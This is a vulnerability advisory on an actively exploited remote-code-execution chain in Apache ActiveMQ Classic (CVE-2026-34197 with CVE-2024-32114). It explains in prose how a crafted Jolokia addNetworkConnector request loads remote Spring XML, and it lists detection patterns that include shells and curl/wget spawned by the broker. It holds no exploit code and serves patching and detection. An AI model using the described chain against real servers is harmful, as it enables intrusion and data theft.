Critical 13-Year-Old RCE Flaw in Apache ActiveMQ (CVE-2026-34197) Actively Exploited

Unauthenticated RCE Possible in Apache ActiveMQ by Chaining New and Old Vulnerabilities

CRITICAL
April 13, 2026
5m read
VulnerabilityPatch ManagementCyberattack

Related Entities

Organizations

Apache Software FoundationHorizon3.aiSentinelOne

Products & Tech

Apache ActiveMQ

CVE Identifiers

CVE-2026-34197
CRITICAL
CVEDetails.com CVE.org
CVE-2024-32114
HIGH
CVEDetails.com CVE.org

MITRE ATT&CK Techniques

T1190Initial Access

Exploit Public-Facing Application

T1059Execution

Command and Scripting Interpreter

T1210Lateral Movement

Exploitation of Remote Services

Full Report

Executive Summary

Security researchers have disclosed a critical remote code execution (RCE) vulnerability, CVE-2026-34197, in Apache ActiveMQ Classic, a popular open-source message broker. The vulnerability, which has been latent in the codebase for 13 years, is being actively exploited in the wild. The flaw resides in the Jolokia JMX-HTTP bridge and allows an authenticated attacker to achieve RCE. However, the threat is magnified because it can be chained with CVE-2024-32114, a flaw that makes the vulnerable endpoint completely unauthenticated. This combination allows attackers to achieve unauthenticated RCE, leading to a full system compromise. The Apache Software Foundation has released patches, and immediate action is required.

Vulnerability Details

  • CVE-2026-34197: This is an improper input validation vulnerability. An authenticated attacker can send a specially crafted request to the addNetworkConnector() operation via the Jolokia API endpoint (/api/jolokia/). By providing a malicious discovery URI, the attacker can trick the ActiveMQ broker into loading a remote Spring XML application context. This allows them to execute arbitrary Java code within the context of the ActiveMQ process.

  • CVE-2024-32114: This vulnerability, affecting ActiveMQ versions 6.0.0 through 6.1.1, improperly removes security constraints from the /api/* path. The practical effect is that the entire Jolokia API, including the vulnerable addNetworkConnector() method, becomes accessible without any authentication.

The chaining of these two vulnerabilities is what makes this threat so severe. An attacker needs no prior access or credentials to achieve full remote code execution on a vulnerable, internet-facing ActiveMQ server.

Affected Systems

  • CVE-2026-34197 affects all versions of Apache ActiveMQ Classic prior to 5.19.4 and versions 6.0.0 through 6.2.2.
  • The unauthenticated exploit chain is possible on versions 6.0.0 through 6.1.1 where both vulnerabilities are present.

Exploitation Status

Multiple security firms, including Horizon3.ai and SentinelOne, have confirmed that CVE-2026-34197 is being actively exploited in the wild. Proof-of-concept (PoC) exploit code is publicly available, lowering the bar for attackers to weaponize this vulnerability.

Impact Assessment

Successful exploitation of this vulnerability chain results in a complete compromise of the ActiveMQ server. An attacker can:

  • Execute arbitrary commands with the privileges of the ActiveMQ service account.
  • Steal or manipulate all data passing through the message broker.
  • Use the compromised server as a pivot point to attack other systems within the internal network.
  • Deploy ransomware or other malware.

Given that ActiveMQ is often used as a central messaging backbone for enterprise applications, a compromise could have devastating and widespread consequences.

Cyber Observables for Detection

Security teams should hunt for evidence of exploitation in their logs:

Type Value Description Context Confidence
url_pattern /api/jolokia/ Any access to this URL path should be scrutinized. On patched or properly configured systems, it should not be exposed. Web server access logs, WAF logs, Reverse proxy logs high
string_pattern addNetworkConnector The presence of this string in POST data to the Jolokia endpoint is a strong indicator of an exploitation attempt. WAF logs, Application-level logging high
string_pattern discoveryURI The discoveryURI parameter being used with protocols like http:// or ldap:// in a Jolokia request is highly suspicious. WAF logs, Application-level logging high
process_name Unusual child processes of the ActiveMQ Java process Monitor for the ActiveMQ JVM spawning shells (sh, bash, cmd.exe) or network tools (curl, wget). EDR logs, Host-based monitoring (Sysmon Event ID 1) high

Detection Methods

  1. Vulnerability Scanning: Use a vulnerability scanner to identify all instances of Apache ActiveMQ in your environment and check if they are running a vulnerable version.
  2. Log Analysis: Ingest ActiveMQ and web server logs into a SIEM. Create alerts for any access to the /api/jolokia/ endpoint, especially if it contains the strings addNetworkConnector or discoveryURI.
  3. Network Traffic Analysis: Monitor network traffic for outbound connections from ActiveMQ servers to suspicious IP addresses, which could indicate a reverse shell or data exfiltration.
  4. D3FEND Techniques: Implement D3-NTA: Network Traffic Analysis to detect the anomalous network connections resulting from a successful RCE. Use D3-PA: Process Analysis on the host to detect when the Java process spawns unexpected child processes like a shell.

Remediation Steps

  1. Patch Immediately: The primary remediation is to upgrade to a patched version. The Apache Software Foundation has released:
    • ActiveMQ 6.2.3
    • ActiveMQ 5.19.4
  2. Workaround (If Patching is Delayed): If immediate patching is not possible, restrict access to the ActiveMQ web console. Ensure that it is not exposed to the public internet. Access should be limited to trusted administrative hosts via firewall rules. Additionally, ensure the jolokia-agent is not enabled in the configuration if it is not explicitly needed.
  3. Verification: After patching, verify that the vulnerable endpoint is no longer accessible and that the application functions as expected.

Timeline of Events

1
April 13, 2026
This article was published

MITRE ATT&CK Mitigations

Update Software

M1051

The primary mitigation is to apply the security patches provided by Apache immediately.

Mapped D3FEND Techniques:

D3-SU

Limit Access to Resource Over Network

M1035

As a temporary measure, restrict network access to the ActiveMQ web console and API endpoints, ensuring they are not exposed to the internet.

Disable or Remove Feature or Program

M1042

If the Jolokia agent is not needed for monitoring, disable it in the ActiveMQ configuration to remove the attack surface.

Mapped D3FEND Techniques:

D3-ACHD3-EDLD3-SCF

Sources & References

Critical Vulnerability in Apache ActiveMQ Classic
Cyber Security Agency of SingaporeApril 13, 2026
CVE-2026-34197: Apache ActiveMQ RCE via Jolokia API
Horizon3.aiApril 13, 2026
RCE Bug Lurked in Apache ActiveMQ Classic for 13 Years
SecurityWeekApril 13, 2026
CVE-2026-34197 - Remote Code Execution in Apache Activemq
SnykApril 13, 2026
CVE-2026-34197: Apache ActiveMQ RCE Vulnerability
SentinelOneApril 13, 2026
CVE-2026-34197 — Remote Code Execution in Apache Activemq
dbugsApril 13, 2026

Article Author

Jason Gomes

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & AnalysisSecurity Orchestration (SOAR/XSOAR)Incident Response & Digital ForensicsSecurity Operations Center (SOC)SIEM & Security AnalyticsCyber Fusion & Threat SharingSecurity Automation & IntegrationManaged Detection & Response (MDR)
LinkedIn

Tags

RCEApacheActiveMQJolokiazero-dayCVE-2026-34197

📢 Share This Article

Help others stay informed about cybersecurity threats